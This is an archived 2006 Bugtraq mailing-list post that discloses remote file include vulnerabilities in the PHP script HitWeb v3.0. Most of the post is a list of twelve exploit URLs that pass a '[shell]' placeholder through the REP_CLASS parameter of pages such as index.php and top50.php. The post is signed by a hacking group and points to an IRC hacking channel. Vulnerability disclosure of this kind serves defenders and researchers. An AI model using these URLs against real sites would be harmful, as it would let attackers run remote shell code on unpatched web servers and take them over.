[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

HitWeb v3.0 - Remote File Include Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: HitWeb v3.0 - Remote File Include Vulnerabilities
From: erne@xxxxxxxxxxxxx
Date: 15 Sep 2006 21:37:15 -0000

#  ERNE ---- ERNEALiZM ---- BU ASK BiTMEZ----
 
#  HitWeb v3.0 - Remote File Include Vulnerabilities
 
# site    : http://www.comscripts.com/jump.php?action=script&id=12
 
# Script  :  HitWeb v3.0
 
# Credits : ERNE
 
# Contact : erne@xxxxxxxxxxxxx  and irc.gigachat.net #kurdhack
 
# Thanks  : BLaCKWHITE, Blackened, Di_lejyoner
 
# Vulnerable :
 
     
         http://www.site.com/[path]/index.php?REP_CLASS=[shell]

         http://www.site.com/[path]/arbo.php?REP_CLASS=[shell]

         http://www.site.com/[path]/framepoint.php?REP_CLASS=[shell]

         http://www.site.com/[path]/genpage.php?REP_CLASS=[shell]

         http://www.site.com/[path]/lienvalider.php?REP_CLASS=[shell]
 
         http://www.site.com/[path]/appreciation.php?REP_CLASS=[shell]

         http://www.site.com/[path]/partenariat.php?REP_CLASS=[shell]

         http://www.site.com/[path]/rechercher.php?REP_CLASS=[shell]

         http://www.site.com/[path]/projet.php?REP_CLASS=[shell]
        
         http://www.site.com/[path]/proposite.php?REP_CLASS=[shell]
 
         http://www.site.com/[path]/refererpoint.php?REP_CLASS=[shell]

         http://www.site.com/[path]/top50.php?REP_CLASS=[shell]

Follow-Ups:
- Re: HitWeb v3.0 - Remote File Include Vulnerabilities
  - From: Carsten Eilers

Prev by Date: Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
Next by Date: NixieAffiliate all version bypass admin and xss
Previous by thread: Techno Dreams Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
Next by thread: Re: HitWeb v3.0 - Remote File Include Vulnerabilities
Index(es):
- Date
- Thread